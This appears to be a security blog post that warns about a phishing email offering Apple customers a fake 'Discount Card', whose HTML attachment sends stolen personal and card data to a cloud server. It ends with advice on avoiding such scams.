Phishing for Apples in the Cloud

Apple customers in the UK and Australia are being targeted in a convincing-looking phishing scam with a cloudy twist.
 
Criminals are sending out targeted emails promising a “Discount Card” as a “reward to long-term customers“. This non-existent card supposedly offers £100 or $100 of credit at any Apple store, for the low-low price of just £9. As you can see below, the email contains enough location and currency specific information to make it more credible.
 

Phishing mail out to steal your personal info


 
Of course the card does not exist and will never be delivered. Instead of a link to a phishing site, the mail contains an html attachment, again convincing looking, using Apple style sheets. The criminals ask for a slew of personal and financial information including name, address, drivers licence number, date of birth, credit card number, expiry date, security code and sort code. Quite enough for some serious financial fraud.
 

Submit!


 
Instead of this stolen information being directly uploaded to a criminal or compromised server, the big blue Submit button POSTs the data to a server in Amazon’s EC2 cloud as shown below with dummy data. Once the data has been successfully sent to the criminal server, the browser is redirected to the official Apple web site.
 

Captured traffic from the phishing attack


 
This cleverly crafted and targeted attack may well be enough to fool the unwary, and it’s abuse of commercial cloud infrastructure will make it much more likely to overcome URL blocking security mechanisms.
 
I have informed Amazon of this abuse of their services, but in the meantime remember, there’s no such thing as an “Apple Discount Card”.
 
Never respond to unsolicited email, never open files attached to unsolicited email and never enter personal data on anything other than an SSL encrypted web site (one where the address starts with “https://“). If you do receive an email making you an offer you can’t refuse, do not follow links in the mail, but contact the vendor directly either by typing in their web address or using the good old telephone.
 

Leave a Reply

Your email address will not be published. Required fields are marked *

*